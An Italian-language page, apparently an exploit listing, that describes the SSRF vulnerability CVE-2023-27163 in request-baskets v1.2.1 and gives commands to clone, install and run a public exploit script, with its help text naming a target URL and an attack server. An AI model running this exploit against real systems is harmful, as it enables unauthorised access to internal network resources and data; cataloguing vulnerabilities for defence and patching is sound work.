
CVE-2023-27163 Request-Baskets v1.2.1 - Falsificazione di richieste lato server (SSRF)
Request-Baskets v1.2.1 - Falsificazione di richieste lato server (SSRF)
È stato scoperto che request-baskets fino alla versione v1.2.1 contiene una Server-Side Request Forgery (SSRF) tramite il componente /api/baskets/{name}. Questa vulnerabilità consente agli aggressori di accedere a risorse di rete e informazioni sensibili tramite una richiesta API modificata.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Script di exploit di Request Baskets
argomenti posizionali:
url percorso principale (/) del server (es. http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
opzioni:
-h, --help mostra questo messaggio di aiuto ed esci